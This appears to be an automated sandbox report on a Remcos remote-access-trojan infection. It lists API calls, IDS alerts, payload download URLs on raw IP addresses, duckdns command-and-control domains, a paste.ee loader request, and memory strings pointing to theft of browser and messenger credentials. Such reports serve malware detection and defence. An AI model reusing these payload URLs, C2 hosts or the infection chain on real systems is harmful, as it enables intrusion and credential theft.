Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_004090DC __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,	8_2_004090DC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0040B6B5 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	8_2_0040B6B5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0041C7E5 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,	8_2_0041C7E5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0040B8BA FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	8_2_0040B8BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_0044E989 FindFirstFileExA,	8_2_0044E989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00408CDE __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,	8_2_00408CDE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00419CEE FindFirstFileW,FindNextFileW,FindNextFileW,	8_2_00419CEE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00407EDD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,	8_2_00407EDD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_00406F13 FindFirstFileW,FindNextFileW,	8_2_00406F13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	8_2_100010F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 8_2_10006580 FindFirstFileExA,	8_2_10006580
Source: C:\Windows\SysWOW64\recover.exe	Code function: 9_2_0040B477 FindFirstFileW,FindNextFileW,	9_2_0040B477
Source: C:\Windows\SysWOW64\recover.exe	Code function: 10_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	10_2_00407EF8
Source: C:\Windows\SysWOW64\recover.exe	Code function: 11_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	11_2_00407898

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00407357 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

8_2_00407357

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49697 -> 176.65.144.247:3980
Source: Network traffic	Suricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.8:49695 -> 192.169.69.26:3980
Source: Network traffic	Suricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 176.65.144.247:3980 -> 192.168.2.8:49697
Source: Network traffic	Suricata IDS: 2047750 - Severity 1 - ET MALWARE Base64 Encoded MZ In Image : 217.154.55.185:80 -> 192.168.2.8:49693
Source: Network traffic	Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 172.245.123.32:80 -> 192.168.2.8:49694
Source: Network traffic	Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 172.245.123.32:80 -> 192.168.2.8:49694
Source: Network traffic	Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 217.154.55.185:80 -> 192.168.2.8:49693
Source: Network traffic	Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.8:49696 -> 192.169.69.26:3981
Source: Network traffic	Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 172.245.123.32:80 -> 192.168.2.8:49694
Source: Network traffic	Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 172.245.123.32:80 -> 192.168.2.8:49694

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\wscript.exe

Network Connect: 23.186.113.60 443

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: hftook7lmaroutsg1.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg1.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg2.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg3.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg4.duckdns.org
Source: Malware configuration extractor	URLs: hftook7lmaroutsg5.duckdns.org

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Uses dynamic DNS services

Source: unknown	DNS query: name: hftook7lmaroutsg2.duckdns.org
Source: unknown	DNS query: name: hftook7lmaroutsg1.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.8:49697 -> 176.65.144.247:3980

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xampp/c/new_image.jpg HTTP/1.1Host: 217.154.55.185Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/visa/creatingbestthingsforhisbeststepstotakehim.txt HTTP/1.1Host: 172.245.123.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 23.186.113.60 23.186.113.60
Source: Joe Sandbox View	IP Address: 217.154.55.185 217.154.55.185
Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: KCOM-SPNService-ProviderNetworkex-MistralGB KCOM-SPNService-ProviderNetworkex-MistralGB
Source: Joe Sandbox View	ASN Name: WOWUS WOWUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.8:49699 -> 178.237.33.50:80

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185
Source: unknown	TCP traffic detected without corresponding DNS query: 217.154.55.185

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Code function: 8_2_00427321 recv,

8_2_00427321

Source: global traffic	HTTP traffic detected: GET /d/c30NOIBR/0 HTTP/1.1Accept: /Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/c/new_image.jpg HTTP/1.1Host: 217.154.55.185Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/visa/creatingbestthingsforhisbeststepstotakehim.txt HTTP/1.1Host: 172.245.123.32Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: recover.exe, 00000009.00000002.1151189070.0000000003539000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000003.1150494750.0000000003539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config equals www.facebook.com (Facebook)
Source: recover.exe, 00000009.00000002.1151189070.0000000003539000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 00000009.00000003.1150494750.0000000003539000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: CasPol.exe, 00000008.00000002.3469653795.0000000004540000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 00000009.00000002.1150649991.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.dathttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: recover.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)

Source: global traffic	DNS traffic detected: DNS query: paste.ee
Source: global traffic	DNS traffic detected: DNS query: hftook7lmaroutsg1.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: hftook7lmaroutsg2.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: powershell.exe, 00000005.00000002.1078641425.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.123.32
Source: powershell.exe, 00000005.00000002.1078641425.0000000005395000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://172.245.123.32/xampp/visa/creatingbestthingsforhisbeststepstotakehim.txt
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://217.154.55.185
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://217.154.55.185/xampp/c/new_image.jpg
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: svchost.exe, 0000000D.00000002.2812616815.0000021A95000000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: qmgr.db.13.dr	String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.13.dr	String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: CasPol.exe, CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1081213353.0000000006382000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000008.00000002.3466361375.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: CasPol.exe, 00000008.00000002.3467761348.00000000011E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpSystem32
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpa
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpj
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpl
Source: CasPol.exe, 00000008.00000002.3467761348.0000000001226000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gpx
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhv90B.tmp.9.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000005.00000002.1078641425.0000000004F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1078641425.00000000050B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: svchost.exe, 0000000E.00000002.1365372131.0000029365813000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000003.1121425570.000000000367D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000B.00000003.1121454434.000000000367D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: recover.exe, 0000000B.00000003.1121425570.000000000367D000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000B.00000003.1121454434.000000000367D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.comata
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: CasPol.exe, 00000008.00000002.3469164599.00000000038E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: recover.exe, 00000009.00000002.1150759009.0000000003034000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: recover.exe, 0000000B.00000002.1121592224.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: powershell.exe, 00000005.00000002.1078641425.0000000004F61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBDr
Source: wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.past
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: wscript.exe, 00000003.00000002.1044588740.0000000002AFA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1045595440.000000000599D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000003.00000002.1043955173.0000000002A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1041867959.0000000004EB3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1081213353.0000000005FC6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/V1/MapControlConfiguration/native/
Source: svchost.exe, 0000000E.00000003.1364601376.0000029365844000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1363995424.0000029365871000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364546066.000002936585D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365827747.0000029365873000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365570437.0000029365845000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000E.00000003.1363995424.0000029365871000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365827747.0000029365873000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000E.00000003.1364138584.000002936586A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365747346.000002936586B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000E.00000002.1365855166.000002936587A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1363908355.0000029365878000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000E.00000003.1364247213.0000029365842000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364546066.000002936585D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365512983.0000029365840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
Source: svchost.exe, 0000000E.00000002.1365450419.000002936582B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364138584.000002936586A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365747346.000002936586B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000E.00000003.1364626820.000002936585A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365651716.000002936585B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000E.00000002.1365717183.0000029365866000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.1365512983.0000029365840000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1364186133.0000029365865000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
